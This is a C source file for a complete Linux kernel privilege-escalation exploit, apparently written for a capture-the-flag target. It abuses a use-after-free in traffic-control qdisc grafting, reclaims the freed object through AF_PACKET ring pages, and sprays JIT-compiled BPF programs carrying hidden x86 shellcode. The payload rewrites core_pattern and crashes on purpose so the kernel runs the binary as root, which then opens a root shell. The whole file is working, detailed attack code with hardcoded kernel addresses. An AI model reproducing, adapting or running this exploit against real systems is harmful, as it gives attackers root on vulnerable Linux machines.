#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <net/if.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/timerfd.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <syscall.h>
#include <sys/mman.h>
#include <netinet/in.h>
#include <linux/if_packet.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_sched.h>
#include <linux/pkt_cls.h>
#include <linux/membarrier.h>
#include <linux/limits.h>
#include <linux/filter.h>

#include "netlink.h"

// Short fixed-width integer aliases used throughout this file.
// (uint*_t from <stdint.h> instead of the non-standard u_int*_t so the
// typedefs also build under strict -std= modes; same underlying types.)
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
typedef uint64_t u64;
typedef int8_t i8;
typedef int16_t i16;
typedef int32_t i32;
typedef int64_t i64;

// Element count of a statically-sized array (do not use on pointers).
#define LEN(x) (sizeof(x) / sizeof((x)[0]))
// Abort with a diagnostic (errno + stringified condition) if x is false.
#define ASSERT(x) ({ if (!(x)) { err(EXIT_FAILURE, #x); } })
// Evaluate a syscall-style expression once; abort on -1, otherwise yield
// its value. __typeof__ (not plain typeof) so this compiles pre-C23 with
// strict standards flags.
#define SYSCHK(x) ({ __typeof__(x) __tmp = (x); if (__tmp == (__typeof__(x))-1) { err(EXIT_FAILURE, #x); } __tmp; })

// Pin the calling process to the given CPU; aborts on failure.
// The exploit relies on per-CPU slab caches, so allocations must happen
// on a known core.
static void pin_to_cpu(int id) {
	cpu_set_t mask;

	CPU_ZERO(&mask);
	CPU_SET(id, &mask);
	ASSERT(sched_setaffinity(getpid(), sizeof(mask), &mask) != -1);
}

// Userspace stand-in for the kernel's synchronize_rcu():
// MEMBARRIER_CMD_GLOBAL waits until all CPUs have passed through a full
// barrier, which implies an RCU grace period has elapsed.
// Original idea from https://github.com/lrh2000/StackRot
static void synchronize_rcu() {
	long rc = syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1);
	if (rc < 0)
		perror("membarrier()");
}

// Raise the soft open-file limit to the hard limit so the later socket
// sprays do not run out of file descriptors.
static void set_rlimit_nofile() {
	struct rlimit lim = {};

	ASSERT(prlimit(0, RLIMIT_NOFILE, NULL, &lim) == 0);
	lim.rlim_cur = lim.rlim_max;
	ASSERT(prlimit(0, RLIMIT_NOFILE, &lim, NULL) == 0);
}

// Send a netlink request and require a fully successful round trip:
// send succeeds, a reply arrives, and the reply carries no error code.
// No trailing semicolon after while(0): call sites write
// `NETLINK_SEND_CHECK(...);` themselves, so the macro expands to exactly
// one statement and stays safe inside unbraced if/else.
#define NETLINK_SEND_CHECK(fd, nlh, max_size) do {\
		ASSERT(!netlink_send(fd, nlh)); \
		ASSERT(netlink_recv(fd, nlh, max_size) > 0); \
		ASSERT(!netlink_errno(nlh)); \
	} while(0)

// Per-build kernel symbol addresses. Select the target kernel at compile
// time (-DLTS_6_66 or -DCOS_105_17412_495_73); unknown builds fail fast.
// Only the *difference* between the two symbols is used (see OFF below),
// so kernel-image KASLR cancels out.
#if LTS_6_66
const u64 entry_SYSCALL_64 = 0xffffffff82600080;
const u64 core_pattern = 0xffffffff83db6560;
#elif COS_105_17412_495_73
const u64 entry_SYSCALL_64 = 0xffffffff82200080;
const u64 core_pattern = 0xffffffff8379eac0;
#else
#error "unknown version"
#endif

// macro to get the (i)th offset byte for the instruction
// mov sil, <byte>
// The byte is shifted into bits 16..23 so that OR-ing it into a
// BPF_LD|BPF_K immediate (see bpf_prog_payload) patches what is
// presumably the instruction's immediate byte — see jit.s to confirm.
#define OFF(i) ((((core_pattern - entry_SYSCALL_64) >> (i*8)) & 0xFF) << 16)

// this payload was generated from jit.s using some basic find / replace magic:
// basically does the following:
// core_pattern := "|/proc/%P/exe";
// while (1) {}
//
// Each entry is a classic-BPF "load immediate" whose 32-bit constant the
// JIT emits verbatim into the program; executing the JITed code at an
// unaligned offset (see spray_bpf_jit) runs the bytes hidden inside the
// constants as x86 instructions. Do NOT reorder or edit these values —
// they are raw machine code.
struct sock_filter bpf_prog_payload[] = {
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90c931 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90d231 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90c0b1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c18e1c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c9082b1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90320f },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90c931 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c9020b1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3ce2d348 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	// the next four entries get the byte-wise offset core_pattern -
	// entry_SYSCALL_64 patched in via OFF(i), so the payload can locate
	// core_pattern at runtime without an absolute address
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c00b640 | OFF(3) },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c00b640 | OFF(2) },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c00b640 | OFF(1) },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c00b640 | OFF(0) },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cf20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90c031 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c9004b0 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	// the following constants carry the ASCII bytes of "|/proc/%P/exe"
	// (e.g. 0x2f '/', 0x70 'p', 0x72 'r', ...) written out in chunks
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c72b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c70b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c2fb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c7cb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c903289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c25b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c2fb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c63b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c6fb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c903289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c78b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c65b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c2fb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c50b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c903289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c65b640 },
#if 0
	// original infinite loop version
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c903289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90feeb },
#endif
	// return NULL
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c583289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc3c031 },
};
// Number of sock_filter instructions in the payload above.
#define BPF_PROG_PAYLOAD_LEN (sizeof(bpf_prog_payload) / sizeof(struct sock_filter))
// in module_alloc: MODULES_VADDR = 0xffffffffc0000000
//       with KASLR: offset = [1, 1024] * PAGE_SIZE
// ==> allocating more than 1024 pages breaks KASLR completely
// BPF_MAXINSNS = 4096
// bpf allocation does 8 byte header + 16 byte random slide + program size
// with program size ~ headers + N * 2 + M * 5 [rounded to multiple of 64]
//   with N = len of nop sled
//   with M = number of payload instructions
// => N ~ 1880 allocates exactly 1 page for each program
// We want to allocate exactly one page per payload to ensure alignment
#define PROG_LEN (1880 + BPF_PROG_PAYLOAD_LEN)
// spray 3000 pages just to be sure (way more than we need to)
#define N_PROGS 3000
// Guessed address of one of the sprayed JITed programs:
// module base + past the maximum KASLR page offset (+ slack), + 92 to be
// beyond any randomized header, + 1 to land *unaligned* inside the nop
// sled so the bytes hidden in the BPF_K immediates execute.
// NOTE(review): the "+ +" below is a unary plus — harmless, but easy to
// misread.
static u64 bpf_payload_location = 0xffffffffc0000000 +
	+ (1024 + 1024 + 123 /* just to be sure */) * 0x1000
	+ 92 /* large enough offset to bypass randomized header len */
	+ 1 /* break alignment to execute _our_ code */;

// Spray N_PROGS classic-BPF programs via SO_ATTACH_FILTER so that the JIT
// fills the module region with page-sized copies of our program; combined
// with the bounded KASLR page offset (see bpf_payload_location) this makes
// the payload address a reliable guess. The filter sockets are deliberately
// leaked so the JITed programs stay resident.
static void spray_bpf_jit() {
	struct sock_filter filter[PROG_LEN];
	unsigned i = 0;
	for (; i < PROG_LEN - 1; i++) {
		// fill filter with "nop sled"
		//
		// this generates
		// f7 d8	neg eax
		// if we hit this unaligned, we get our "nop":
		// d8 f7	fdiv st,st(7)
		filter[i].code = BPF_ALU | BPF_NEG;

		// why this code and not another one?
		// - bpf_jit_binary_pack_alloc() will add a random offset which is a multiple of 4
		// - bpf function prologue's size is a multiple of 4
		// => by generating nop instructions that are a multiple of 2 we do not break
		//    the alignment and can make sure that we hit the correct "unalignment"
		//    even after randomization
		//    (note that we made sure that all our payloads allocate exactly one page)
	}
	// last opcode needs to be ret.
	filter[i].code = BPF_RET + BPF_K;
	filter[i].k = 0;

	// place the payload at the very end of the program, just before ret
	i = PROG_LEN - 1/*ret*/ - BPF_PROG_PAYLOAD_LEN;
	memcpy(&filter[i], bpf_prog_payload, sizeof(bpf_prog_payload));

	// need some opcode which can break out of the nop sled

	// this will be optimized into
	// d1 e8            	shr eax, 1
	filter[i - 3].code = BPF_ALU | BPF_RSH | BPF_K;
	filter[i - 3].k = 1;
	// 05 00 00 00 3c   	add eax, 0x3c000000
	filter[i - 2].code = BPF_ALU | BPF_ADD | BPF_K;
	filter[i - 2].k = 0x3c000000;

	// 05 00 00 00 3c   	add eax, 0x3c000000
	filter[i - 1].code = BPF_ALU | BPF_ADD | BPF_K;
	filter[i - 1].k = 0x3c000000;

	// coming from the unaligned nop-sled this yields:
	//    d8 ..
	//    .. d1            	fcom st(1)
	//    e8 05 00 00 00   	call x
	//    05 ..
	//    3c 00 00 00 ..  	add eax, 0x05
	//  x:	.. 3c ..
	//    b8              	cmb  al, 0xb8
	//    .. payload continues

	struct sock_fprog prog = {
		.len = PROG_LEN,
		.filter = filter,
	};

	int fd;
	for (i = 0; i < N_PROGS; i++) {
		fd = SYSCHK(socket(AF_INET, SOCK_DGRAM, 0));
		ASSERT(setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)) != -1);

		// leak fd .. (intentional: closing would free the JITed program)
	}
}
//

// Set interface flags (e.g. IFF_UP) and optionally the MTU on the link
// with index `ifindex` via an RTM_NEWLINK request; aborts on any error.
void ip_link_set_flags(int s, int ifindex, unsigned int ifi_flags, unsigned mtu) {
	u8 msg[1024] = {0};
	struct nlmsghdr* hdr = (struct nlmsghdr*)msg;
	struct ifinfomsg* ifi = NLMSG_DATA(hdr);

	hdr->nlmsg_len = NLMSG_HDRLEN + sizeof(*ifi);
	hdr->nlmsg_type = RTM_NEWLINK;
	hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	hdr->nlmsg_seq = 0;
	hdr->nlmsg_pid = 0;

	ifi->ifi_family = PF_UNSPEC;
	ifi->ifi_type = 0;
	ifi->ifi_index = ifindex;
	ifi->ifi_flags = ifi_flags;
	ifi->ifi_change = 1;

	// MTU is optional; 0 means "leave unchanged"
	if (mtu)
		netlink_attr_put(hdr, IFLA_MTU, &mtu, sizeof(mtu));

	NETLINK_SEND_CHECK(s, hdr, sizeof(msg));
}

static void __setup_newqdisc_msg(struct nlmsghdr* nlh, unsigned if_index, unsigned parent, unsigned handle, const char* name) {
	struct tcmsg* data = NLMSG_DATA(nlh);
	nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
	nlh->nlmsg_type = RTM_NEWQDISC;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
	nlh->nlmsg_seq = 0;
	nlh->nlmsg_pid = 0;

	data->tcm_family = PF_UNSPEC;
	data->tcm_ifindex = if_index;
	data->tcm_parent = parent;
	data->tcm_handle = handle & 0xFFFF0000;

	if (name)
		netlink_attr_put(nlh, TCA_KIND, name, strlen(name));
}

// Fill `nlh` with an RTM_NEWTCLASS request skeleton for the class
// `parent | (handle & 0xFFFF)`; NLM_F_CREATE is added when `create` is set.
static void __setup_newclass_msg(struct nlmsghdr* nlh, unsigned if_index, unsigned parent, unsigned handle, bool create) {
	struct tcmsg* tcm = NLMSG_DATA(nlh);

	nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*tcm);
	nlh->nlmsg_type = RTM_NEWTCLASS;
	nlh->nlmsg_flags = create
		? (NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE)
		: (NLM_F_REQUEST | NLM_F_ACK);
	nlh->nlmsg_seq = 0;
	nlh->nlmsg_pid = 0;

	tcm->tcm_family = PF_UNSPEC;
	tcm->tcm_ifindex = if_index;
	tcm->tcm_parent = parent;
	// class handles combine the parent major with a 16-bit minor
	tcm->tcm_handle = parent | (handle & 0xFFFF);
}

// Create or modify a DRR class, passing the scheduling quantum as a
// TCA_DRR_QUANTUM attribute nested inside TCA_OPTIONS.
static void change_drr_class(int fd, unsigned int if_index, unsigned int parent, unsigned int handle, bool create, u32 quantum) {
	u8 msg[1024] = {0};
	struct nlmsghdr* hdr = (struct nlmsghdr*)msg;

	__setup_newclass_msg(hdr, if_index, parent, handle, create);

	struct nlattr* opts = netlink_nest_begin(hdr, TCA_OPTIONS);
	netlink_attr_append(opts, TCA_DRR_QUANTUM, &quantum, sizeof(quantum));
	netlink_nest_end(hdr, opts);

	NETLINK_SEND_CHECK(fd, hdr, sizeof(msg));
}

// Delete the traffic-control class `parent | (handle & 0xFFFF)` on the
// given interface via RTM_DELTCLASS; aborts on any error.
static void delete_class(int fd, unsigned int if_index, unsigned int parent, unsigned int handle) {
	u8 msg[1024] = {0};
	struct nlmsghdr* hdr = (struct nlmsghdr*)msg;
	struct tcmsg* tcm = NLMSG_DATA(hdr);

	hdr->nlmsg_len = NLMSG_HDRLEN + sizeof(*tcm);
	hdr->nlmsg_type = RTM_DELTCLASS;
	hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	hdr->nlmsg_seq = 0;
	hdr->nlmsg_pid = 0;

	tcm->tcm_family = PF_UNSPEC;
	tcm->tcm_ifindex = if_index;
	tcm->tcm_parent = parent;
	tcm->tcm_handle = parent | (handle & 0xFFFF);

	NETLINK_SEND_CHECK(fd, hdr, sizeof(msg));
}


// Create a DRR qdisc. When `stab` is non-NULL, a size table (TCA_STAB)
// with `stab->tsize` u16 entries from `stab_data` is attached as well.
static void create_qdisc_drr(int fd, unsigned int if_index, unsigned int parent, unsigned int handle, const struct tc_sizespec* stab, const u16* stab_data) {
	u8 msg[1024] = {0};
	struct nlmsghdr* hdr = (struct nlmsghdr*)msg;

	__setup_newqdisc_msg(hdr, if_index, parent, handle, "drr");

	if (stab) {
		struct nlattr* nest = netlink_nest_begin(hdr, TCA_STAB);
		netlink_attr_append(nest, TCA_STAB_BASE, stab, sizeof(*stab));
		netlink_attr_append(nest, TCA_STAB_DATA, stab_data, stab->tsize * sizeof(u16));
		netlink_nest_end(hdr, nest);
	}

	NETLINK_SEND_CHECK(fd, hdr, sizeof(msg));
}

// Create a "plug" qdisc with the given queueing options (TCA_OPTIONS).
static void create_qdisc_plug(int fd, unsigned if_index, unsigned int parent, unsigned int handle, struct tc_plug_qopt* opt) {
	u8 msg[1024] = {0};
	struct nlmsghdr* hdr = (struct nlmsghdr*)msg;

	__setup_newqdisc_msg(hdr, if_index, parent, handle, "plug");
	netlink_attr_put(hdr, TCA_OPTIONS, opt, sizeof(*opt));

	NETLINK_SEND_CHECK(fd, hdr, sizeof(msg));
}

// Reconfigure an existing "plug" qdisc (e.g. to release buffered packets).
// NLM_F_CREATE is cleared so the request only matches an existing qdisc.
static void change_qdisc_plug(int fd, unsigned if_index, unsigned int parent, unsigned int handle, struct tc_plug_qopt* opt) {
	u8 msg[1024] = {0};
	struct nlmsghdr* hdr = (struct nlmsghdr*)msg;

	__setup_newqdisc_msg(hdr, if_index, parent, handle, "plug");
	hdr->nlmsg_flags &= ~NLM_F_CREATE;
	netlink_attr_put(hdr, TCA_OPTIONS, opt, sizeof(*opt));

	NETLINK_SEND_CHECK(fd, hdr, sizeof(msg));
}

// Create a default pfifo qdisc under `parent` with the given handle.
static void create_qdisc_pfifo(int fd, unsigned if_index, unsigned int parent, unsigned int handle) {
	u8 msg[1024] = {0};
	struct nlmsghdr* hdr = (struct nlmsghdr*)msg;

	__setup_newqdisc_msg(hdr, if_index, parent, handle, "pfifo");
	NETLINK_SEND_CHECK(fd, hdr, sizeof(msg));
}


// Graft the existing qdisc `from` onto class/parent `to` via an
// RTM_NEWQDISC with NLM_F_REPLACE (and without NLM_F_CREATE, so nothing
// new is allocated): tcm_handle carries the qdisc being moved.
static void graft_qdisc(int fd, unsigned if_index, unsigned int from, unsigned int to) {
	u8 msg[1024] = {0};
	struct nlmsghdr* hdr = (struct nlmsghdr*)msg;

	__setup_newqdisc_msg(hdr, if_index, to, 0, NULL);
	((struct tcmsg*)NLMSG_DATA(hdr))->tcm_handle = from;

	hdr->nlmsg_flags &= ~NLM_F_CREATE;
	hdr->nlmsg_flags |= NLM_F_REPLACE;

	NETLINK_SEND_CHECK(fd, hdr, sizeof(msg));
}

// Allocate kernel pages whose contents we control through an AF_PACKET
// TX ring. Returns the packet socket fd (the ring lives as long as the
// socket) or -1 on failure.
static int alloc_pages_via_sock(u32 pages_per_block, u32 num_blocks) {
	int version = TPACKET_V1;

	int fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
	if (fd < 0)
		return fd;

	if (setsockopt(fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0)
		goto fail;

	struct tpacket_req req = {
		.tp_block_size = pages_per_block * 0x1000,
		.tp_block_nr = num_blocks,
		.tp_frame_size = 4096,
	};
	req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

	/*
	Target is af_packet.c:packet_set_ring() -> alloc_pg_vec() where
	    block_nr := num_blocks
	    and
	    order := pages_per_block - 1

	This allocates a kernel memory region filled with pointers to data we
	control of size 8*num_blocks in GFP_KERNEL.

	This is very helpful to fake the qdisc->ops->peek indirection
	*/

	if (setsockopt(fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0)
		goto fail;

	return fd;

fail:
	close(fd);
	return -1;
}

// Child process: block on `pipefd` until the parent signals, then poll
// /proc/sys/kernel/core_pattern until the BPF payload has rewritten it to
// "|/proc/%P/exe", and finally crash on purpose so the core-dump usermode
// helper executes this binary as root. Never returns normally.
static void wait_for_core_pattern(int pipefd) {
	char buf[128] = {};

	pin_to_cpu(0);
	// wait for the parent's go signal
	ASSERT(read(pipefd, buf, 1) == 1);

	while (1) {
		int core = SYSCHK(open("/proc/sys/kernel/core_pattern", O_RDONLY));
		// NUL-terminate according to the actual number of bytes read;
		// the original ignored the return value, so a failed/short read
		// could leave stale data from a previous iteration in buf.
		ssize_t n = read(core, buf, sizeof(buf) - 1);
		close(core);
		if (n < 0)
			n = 0;
		buf[n] = '\0';

		if (strncmp(buf, "|/proc/%P/exe", 13) == 0) {
			// deliberate NULL write -> SIGSEGV -> core dump -> the
			// kernel runs core_pattern's pipe helper, i.e. us, as root
			asm volatile ("xor %rax, %rax; movq $0, (%rax);");
		}

		usleep(200 * 1000);
	}

	exit(0);
}

// Exploit driver. Two roles depending on uid:
//  - run as root (i.e. re-executed by the kernel's core-dump helper after
//    core_pattern was overwritten): re-attach the original stdio via
//    pidfd_getfd and drop into a shell that prints the flag;
//  - run as the unprivileged user: set up the qdisc tree, trigger the
//    use-after-free, reclaim it with AF_PACKET ring pages pointing
//    ops->peek at the sprayed BPF payload, and fire it.
int main(int argc, char* argv[]) {
	const unsigned int lo = if_nametoindex("lo");

	// qdisc majors (upper 16 bits) and class minors used below
	const unsigned int qdisc_root = 1 << 16;

	const unsigned int class_drr = 1;
	const unsigned int qdisc_drr = 11 << 16;

	const unsigned int class_fifo_A = 11;
	const unsigned int class_fifo_B = 2;
	const unsigned int qdisc_fifo = 777 << 16;

	const unsigned int class_plug = 3;
	const unsigned int qdisc_plug = 13 << 16;

	const unsigned int class_dummy = 128;

	int nfd;

	if (!getuid()) {
		// Root path: we were spawned by the core-dump helper with
		// argv[0] == "/proc/<crashing pid>/exe"; recover that pid and
		// steal its stdio fds so the shell is interactive.
		pid_t pid;
		sscanf(argv[0], "/proc/%u/exe", &pid);

		int pfd = syscall(SYS_pidfd_open, pid, 0);
		int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
		int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
		int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
		dup2(stdinfd,0);
		dup2(stdoutfd,1);
		dup2(stderrfd,2);

		char* shell[] = {
			"/bin/sh",
			"-c",
			"/bin/cat /flag && /bin/sh",
			NULL,
		};
		execve(shell[0], shell, NULL);
		return 0;
	}

	printf("Hello World!\n");

	// pipe used to tell the watcher child when to start polling
	int pipefds[2];
	ASSERT(!pipe(pipefds));

	// fork the watcher that crashes once core_pattern is overwritten
	pid_t pid = SYSCHK(fork());
	if (!pid) {
		close(pipefds[1]);
		wait_for_core_pattern(pipefds[0]);
	}

	set_rlimit_nofile();

	// user+net namespaces: gives us CAP_NET_ADMIN for tc/netlink
	ASSERT(!unshare(CLONE_NEWUSER | CLONE_NEWNET));

	// do this first to avoid noise later
	spray_bpf_jit();

	nfd = SYSCHK(netlink_open(NETLINK_ROUTE));
	ip_link_set_flags(nfd, lo, IFF_UP, 0);

	// UDP pair over loopback used to enqueue packets into the qdiscs
	struct sockaddr_in addr = {
		.sin_family = AF_INET,
		.sin_port = 0,
		.sin_addr.s_addr = htonl(INADDR_LOOPBACK),
	};
	unsigned len = sizeof(addr);
	int s = SYSCHK(socket(AF_INET, SOCK_DGRAM, 0));

	ASSERT(!bind(s, (struct sockaddr*)&addr, len));
	ASSERT(!getsockname(s, (struct sockaddr*)&addr, &len));

	int c = SYSCHK(socket(AF_INET, SOCK_DGRAM, 0));

	struct tc_plug_qopt plug_opt = {
		.limit = 0xffff // in bytes
	};

	// Need to prepare heap layout on known cores
	pin_to_cpu(0);

	// We create the following qdisc structure:
	// (classes in lower case, qdiscs in UPPER CASE)
	//        DRR'(root)
	//       /    |    \
	//      /     |     \
	//     /      |      \
	//   drr   fifo_B   plug
	//   DRR            PLUG
	//    |
	//  fifo_A
	//   FIFO

	create_qdisc_drr(nfd, lo, TC_H_ROOT, qdisc_root, NULL, NULL);
	change_drr_class(nfd, lo, qdisc_root, class_drr, true, 0x8000);
	{
		// we migrate to another cpu for the class which will be freed later.
		// we want the object to stay untouched and not reclaimed. Thus we try to
		// reduce noise by allocating it from another core.
		pin_to_cpu(1);

		change_drr_class(nfd, lo, qdisc_root, class_fifo_B, true, 0x8000);

		// to additionally protect it, we make sure that the drr class does not belong
		// to the active slab anymore
		// (32 objs per slab for kmalloc-128 where struct drr_class resides)
		for (int i = 0; i < 32; i++) {
			change_drr_class(nfd, lo, qdisc_root, class_dummy + 1 + i, true, 1234);
		}

		pin_to_cpu(0);
	}
	// choose a low quantum here to force re-scheduling of the plug class
	// when we trigger the payload. Additionally reduce risk of triggering
	// list corruption in case something modifies list pointers
	change_drr_class(nfd, lo, qdisc_root, class_plug, true, 1);

	create_qdisc_drr(nfd, lo, qdisc_root | class_drr, qdisc_drr, NULL, NULL);
	create_qdisc_plug(nfd, lo, qdisc_root | class_plug, qdisc_plug, &plug_opt);

	change_drr_class(nfd, lo, qdisc_drr, class_fifo_A, true, 0x8000);
	create_qdisc_pfifo(nfd, lo, qdisc_drr | class_fifo_A, qdisc_fifo);

	// Now, we graft FIFO onto the root qdisc:
	//        DRR'(root)
	//       /    |    \
	//      /     |     \
	//     /      |      \
	//   drr   fifo_B   plug
	//   DRR    FIFO    PLUG
	//    |
	//  fifo_A
	// (this is where the bug resides, FIFO will still have parent drr instead of root)
	graft_qdisc(nfd, lo, qdisc_fifo, qdisc_root | class_fifo_B);

	// .. and delete the drr class:
	//        DRR'(root)
	//            |    \
	//            |     \
	//            |      \
	//         fifo_B   plug
	//          FIFO    PLUG
	delete_class(nfd, lo, qdisc_root, class_drr);

	u8 buf[1] = {};

	// activate plug (SO_PRIORITY selects which class the packet enters)
	u32 priority = qdisc_root | class_plug;
	ASSERT(!setsockopt(c, SOL_SOCKET, SO_PRIORITY, &priority, sizeof(priority)));
	ASSERT(sendto(c, buf, 1, 0, (struct sockaddr*)&addr, len) > 0);

	// activate fifo
	priority = qdisc_root | class_fifo_B;
	ASSERT(!setsockopt(c, SOL_SOCKET, SO_PRIORITY, &priority, sizeof(priority)));
	ASSERT(sendto(c, buf, 1, 0, (struct sockaddr*)&addr, len) > 0);

	// trigger free into use-after-free, then wait out the RCU grace period
	// so the kernel has actually freed the Qdisc before we reclaim it
	delete_class(nfd, lo, qdisc_root, class_fifo_B);
	synchronize_rcu();

	// try to reclaim the FIFO qdisc but not its (new) parent class fifo_B
	// struct Qdisc (size = 384) with pfifo->privsize == 0 resides in kmalloc-512, GFP_KERNEL
	// need to overwrite qdisc->ops->peek per drr dequeue operation

	// just enough to go into kmalloc-512
	#define N_BLOCKS ((256 + 8) / 8)

	for (int i = 0; i < 42; i++) {
		// NOTE(review): this inner `i` shadows the loop variable above —
		// intentional here, but easy to trip over when editing.
		int s = SYSCHK(alloc_pages_via_sock(1, N_BLOCKS));
		void* base = SYSCHK(mmap(NULL, 1 * N_BLOCKS * 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, s, 0));

		for (int i = 0; i < N_BLOCKS; i++) {
			// struct Qdisc_ops, we only care about the peek member
			struct {
				u64 _pad[7];
				u64 peek; // struct sk_buff *  (*peek)(struct Qdisc *);
			}* ops = base + i * 0x1000;

			ops->peek = bpf_payload_location;
		}

		munmap(base, 1 * N_BLOCKS * 0x1000);
	}

	// pull trigger by dequeueing packets. This will cause a drr_dequeue on first
	// active class plug. Since its low quantum is exceeded, fifo will be scheduled
	// next and cause our payload to be triggered.

	// need to be on 1 to allow core dump helper to run
	pin_to_cpu(1);
	// start watcher
	ASSERT(write(pipefds[1], "", 1) == 1);

	plug_opt.action = TCQ_PLUG_RELEASE_INDEFINITE;
	change_qdisc_plug(nfd, lo, qdisc_root | class_plug, qdisc_plug, &plug_opt);

	// park forever; the watcher child finishes the job
	while (1) { sleep(100); }
}
